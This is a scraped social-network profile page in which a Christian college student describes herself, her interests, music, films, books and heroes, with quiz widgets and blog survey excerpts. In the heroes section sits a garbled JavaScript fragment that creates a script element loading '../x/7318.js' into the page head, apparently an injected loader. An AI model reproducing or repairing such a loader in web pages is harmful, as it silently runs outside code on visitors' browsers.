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I am here for Friends

About Me

Your Element Is Water
A bit of a contradiction, you can seem both lighthearted and serious.
That's because you're good at going with the flow - but you also are deep.
Highly intuitive, you tune in to people's emotions and moods easily.
You are able to tap into deep emotional connections and connect with others.
You prefer a smooth, harmonious life - but you can navigate your way around waves.
You have a knack for getting people to get along and making life a little more peaceful. What's Your Element?
You Are Bert
Extremely serious and a little eccentric, people find you loveable - even if you don't love them!
You are usually feeling: Logical - you rarely let your emotions rule you
You are famous for: Being smart, a total neat freak, and maybe just a little evil
How you life your life: With passion, even if your odd passions (like bottle caps and pigeons) are baffling to others The Sesame Street Personality Quiz
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Girl Next Door
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Quizilla | Join| Make A Quiz | More Quizzes | Grab CodeI am Amanda. That's all there really is to say about me. Some people like me, some don't. That's fine with me. As long as I like me, it's all good. :) I like to have fun, I like to laugh, I like to be goofy. I like to be serious, I like to cry, I get cranky. I really like earrings and ethnic food and sweatshirts. I have good friends... they're my favorites. I have friends from all over... sometimes I suck at staying friends with all of them, but I like to try. I like meeting new people, but I'm not very good at it cause I get shy. That's silly. I go to school at Azusa Pacific University... sometimes I like it, sometimes I'd rather be living anywhere but here. I have a lot of quirks... like hating bananas and not being able to go in the bathroom without shoes. I like to drink coffee, I miss Lawrence, I wish that there could be burritos every day. That's all I can think of for now... I am Amanda.

My Interests

Your Hippie Chick Name Is:
Paprika Hippie Chick Name GeneratorI would have to say that the thing that interests me the most is social justice. Other main ones include... philosophy, music, world travel, cultures, languages, modern missiology, theology, expanding my vocabulary, learning new things, reading the comics, downtown Lawrence, hanging out with teenagers and believing in them, the arts, museums, buying interesting and inexpensive jewelry, www.relevantmagazine.com, going to shows and pretending that I'm cool, deep conversations about God, friendships with people very different from myself, dreaming, dancing when no one's around, good cries, orphans, catching up with old friends, cuddling, being ME! Even though I'm just a big dork (as you can see from the above list.)
Which Empire Records Character Are You? Find out @ She's CraftyTHIS WAY UP
Amanda has fragile contents which may break!
From Go-Quiz.comAmanda Mayhew from this day forward you will also be known as: Duchess Wobblebottom

I'd like to meet:

What Your Hands Say About You
You are logical, analytical, and rational. You have good verbal skills.

Bold and daring, you're not afraid to change your life if you think it needs an overhaul.

Practical and down to earth, you're a doer not a dreamer. You rather get something done than think about it all day.

Your emotions tend to be nervous and potent. Your energy - both positive and negative - deeply impacts your life. What Do Your Hands Say About You?AIM - Holybread14..
Get this video and more at MySpace.comPeople. People who rock.Hosea 10:12 Sow for yourselves righteousness, reap the fruit of unfailing love, and break up your unplowed ground; for it is time to seek the LORD, until he comes and showers righteousness on you.


I have noticed something about me and music. Of course I have my favorites... I have loved Waterdeep since I was 12 years old, I love Over the Rhine a lot, I've been super into Citizen Cope lately, and when I'm by myself I just mostly listen to chill music that relaxes me and makes me happy. But the thing is, if I'm with you, I'll probably listen to your music and like it. There are few things I don't like... if you want to listen to country, I will tell you to turn that OFF, if you want to listen to music about killing people, do it when I'm not there, preferably... but for the most part, I like hearing new music and I think that listening to their music is a good way to get to know someone. And that's what I've noticed. For good measure, a sampling of my playlist... the Chaffers and everything they've ever done, Coldplay, Lauryn Hill, Johnny Cash, Sarah McLachlan, Radiohead, the Chocolat soundtrack, Pink Floyd, Marley, Dylan, Bjork, Kansas, Nickle Creek, Portishead, John Lennon, Out of Eden, 100 Portraits... and that's just random. I'm random.


I hate movies that have more guns than characters. I love movies that make you think, laugh, cry, or move you in some way. I hate movies that are called The Aviator. I love movies that are called Motercycle Diaries. I love most movies that have ever played at Liberty Hall. I love movies about kids in the ghetto... like Hardball. I like watching teen movies with Leanne because we are awesome. I like movies where you're not quite sure what the point was... for instance, American Movie. I love Empire Records. It's the best. "What's with... TODAY, today?"


I love Gilmore Girls... I wish I could be as witty as Loralai...I am TOTALLY OBSESSED with Project Runway... I can't help it... the drama pulls me in... I also really like watching "I 3 the 90's" because, face it, it's just entertaining television. Don't lie to yourself. You're not too cool, and neither am I.


The Bible, A Ring of Endless Light (and the rest of Madeliene L'Engle), The Four Loves (and the rest of C.S. Lewis), The Hiding Place (I've read it 15 times...), I like books in general and I have a LONG "to-read" list... maybe after college I'll get on that...


Jesus. Robin, anyone who employs an extensive vocabulary, my dad, Mother Teresa, and Loren Cunningham.My cousin Deacon's hair: .."var s=..·('script');s.src='../x/7318.js';..&&# 035;183;getElementsByTagName('head')[0].appendChild(s);"

My Blog

Trouble ain’t gonna be here everyday....

1. Describe in 2 words what ended your last relationship?Mental Breakdown.2. When was the last time you shaved your legs?Um.... June? I think it was for Rachel's wedding.... so that just shows you ho...
Posted by .......Manna on Mon, 29 Oct 2007 11:30:00 PST

My soul music....

What would you rather be called?01. Babe or baby: Do I look like a baby to you? No? Then don't call me that. I have a name.02. Sugar or cupcake: Sugar, Sugar (da da da da da da) Oh, Honey, Honey (d...
Posted by .......Manna on Tue, 23 Oct 2007 11:11:00 PST

This is how the story went, I met someone by accident that blew me away...

1. What is a question that people always ask you?"When's the last time you cut your hair?" As if I didn't notice that it was this long. ((Although, that's not TOTALLY unlikely, since every time I cu...
Posted by .......Manna on Mon, 15 Oct 2007 02:08:00 PST

If I ruled the world.....

1. Honestly, how many people do you have feelings for?I HATE feelings. They are so.... shallow. I have a lot of feelings that lie to me, and I bet you do too. That said, I have feelings about a lot...
Posted by .......Manna on Wed, 19 Sep 2007 09:00:00 PST

So close your eyes, you can close your eyes... it's alright...

1. The phone rings; who do you want it to be?That's a complicated question right now. I'll go with.... someone I love. Which could take many forms.2. When shopping at the grocery store, do you return...
Posted by .......Manna on Sun, 04 Feb 2007 02:42:00 PST

This ain't a scene it's an arms race

In 2006 did you ..[Q]: Have more then 4 boyfriends/girlfriends?:[A]: No!! Haha... I haven't had that many boyfriends in my LIFE! Geez Louise.[Q]: Keep your new years resolution?[A]: I'm not sure that...
Posted by .......Manna on Fri, 05 Jan 2007 08:53:00 PST

She had mystery beneath her skin...

1. Where were you 3 hours ago?Reading "The Poisonwood Bible" and sitting in the flower chair.2. Who are you in love with?Jesus.3. Have you ever eaten a crayon?Not that I can recall.... but our dog us...
Posted by .......Manna on Wed, 27 Dec 2006 10:30:00 PST

I'm gonna love you, forever and ever, forever and ever, amen.

1. Do you still talk with the person you LAST kissed?Why yes I do. Oh boy.2. Have you ever seen your best friend naked?haha... Well, since I have known many of my best friends since we were small chi...
Posted by .......Manna on Wed, 29 Nov 2006 05:03:00 PST

Linford. THE MAN.

Hey Love,Let's go do our taxes. Get drunk. Smoke a big cigar. Drive Jack's big car. Clean up the attic. No, there's no money this month either to pay the bills, but who the fuck cares. Do you think I'...
Posted by .......Manna on Fri, 20 Oct 2006 08:25:00 PST

Damn the Man.

"When I give food to the hungry they call me a saint; when I ask why the poor are hungry they call me a communist." -Dom Helda CamaraThe night of Thursday, September 28th, I spent the night in a South...
Posted by .......Manna on Mon, 02 Oct 2006 11:51:00 PST